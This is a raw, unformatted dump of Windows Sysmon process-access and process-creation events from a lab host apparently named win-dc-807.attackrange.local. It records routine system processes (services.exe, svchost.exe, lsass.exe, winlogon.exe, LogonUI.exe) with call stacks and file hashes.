15:51:00.597{D28789B6-7C62-5FA1-0A00-000000008801}852944C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-0F00-000000008801}1136C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000783Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.602{D28789B6-7C64-5FA1-0F00-000000008801}1136C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k termsvcsC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{D28789B6-7C64-5FA1-E403-000000000000}0x3e40SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000782Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000781Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000780Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000779Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C62-5FA1-0B00-000000008801}86896C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000778Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000777Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000776Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000775Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000774Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000773Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000772Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000771Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000770Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C62-5FA1-0B00-000000008801}86896C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000769Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000768Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.566{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000767Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.566{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000766Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.566{D28789B6-7C62-5FA1-0800-000000008801}724740C:\Windows\system32\csrss.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000765Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.566{D28789B6-7C62-5FA1-0900-000000008801}780784C:\Windows\system32\winlogon.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000764Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.567{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3bc9055 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e71SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000763Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.566{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000762Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.550{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000761Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.550{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000760Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.550{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000759Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 